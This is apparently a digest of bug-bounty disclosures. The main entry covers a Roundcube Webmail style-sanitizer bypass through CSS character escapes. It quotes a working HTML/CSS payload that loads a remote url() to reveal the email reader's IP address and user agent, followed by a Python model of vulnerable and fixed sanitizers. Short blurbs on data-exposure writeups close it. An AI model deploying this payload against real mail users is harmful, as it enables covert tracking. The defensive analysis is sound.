Vulnerability Summary
HackerOne disclosed report: https://hackerone.com/reports/3443563 by somerandomdev
The style sanitizer in Roundcube Webmail can be bypassed by creating HTML entities using CSS character escapes. This allows arbitrary inline CSS (e.g. url()) to survive sanitization, so the sender can retrieve the IP address and user agent of the person reading the email.
<div style='content: "\0026quot;; background: url(//http.cat/418); content:""; width: 100%; height: 100%;'>hi, this shouldn't work :(</div>
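The following is an added example, not code from the report or from Roundcube: a toy model of the decode-order mismatch described above, in which a sanitizer validates the style text, resolves CSS escapes (so "\0026quot;" becomes "&quot;"), and emits the result into an HTML attribute without entity-encoding it, while the browser's HTML parser entity-decodes the attribute before the CSS engine sees it. The sanitizer's exact internals are an assumption; the fixed variant validates the escape-resolved text and HTML-encodes the output.

```python
import html
import re

# CSS character escape: backslash, 1-6 hex digits, optional single whitespace
# (CSS Syntax Level 3). The CSS engine turns "\0026" into "&".
CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})[ \t\n]?")

# The payload quoted in the report above, used here as the sample input.
PAYLOAD = r'content: "\0026quot;; background: url(//http.cat/418); content:""; width: 100%; height: 100%;'


def resolve_css_escapes(value: str) -> str:
    return CSS_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), value)


def strip_quoted_strings(css: str) -> str:
    """Blank out CSS string literals so the allow-check only inspects code, not string data."""
    return re.sub(r'"(?:\\.|[^"\\])*"', '""', css)


def style_is_allowed(css: str) -> bool:
    """Toy policy: url() is only acceptable inside a CSS string literal (inert there)."""
    return "url(" not in strip_quoted_strings(css).lower()


def css_seen_by_browser(attr_value: str) -> str:
    """The HTML parser entity-decodes the attribute value before CSS parsing happens."""
    return html.unescape(attr_value)


def sanitize_style_vulnerable(style: str) -> str:
    # Flaw (constructed model): validate the raw text, then emit the escape-resolved
    # text into the attribute with no HTML encoding. "\0026quot;" -> "&quot;" reaches
    # the attribute as-is, and the browser decodes it to a real double quote, which
    # closes the CSS string and activates the url() that was validated as inert.
    if not style_is_allowed(style):
        return ""
    return resolve_css_escapes(style)


def sanitize_style_fixed(style: str) -> str:
    # Validate the same text the CSS engine will receive (escapes resolved), then
    # HTML-encode the attribute so no "&...;" sequence can be introduced by content.
    resolved = resolve_css_escapes(style)
    if not style_is_allowed(resolved):
        return ""
    return html.escape(resolved, quote=True)


if __name__ == "__main__":
    for name, fn in (("vulnerable", sanitize_style_vulnerable), ("fixed", sanitize_style_fixed)):
        effective = css_seen_by_browser(fn(PAYLOAD))
        print(f"{name}: browser-effective CSS allowed = {style_is_allowed(effective)}")
```

The invariant worth testing in any sanitizer is that the policy holds on the text the browser will actually parse, not on the text the sanitizer happened to inspect.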
A hardcoded backend URL found in a JavaScript bundle exposed an unauthenticated API endpoint that returned 500+ records containing employee full names, enterprise client details, and internal database IDs. The writeup walks through discovering the URL in the JS bundle, querying the API, and the GDPR/business intelligence impact.
This writeup details an Information Disclosure (CWE-200) vulnerability that allowed viewing the source code and complete domain model mapping of a corporate backend.
An unprotected endpoint allowed the exfiltration, via a simple unauthenticated POST request, of gigabytes of configurations, structural metadata, and private personal/corporate information belonging to the organizations using the software.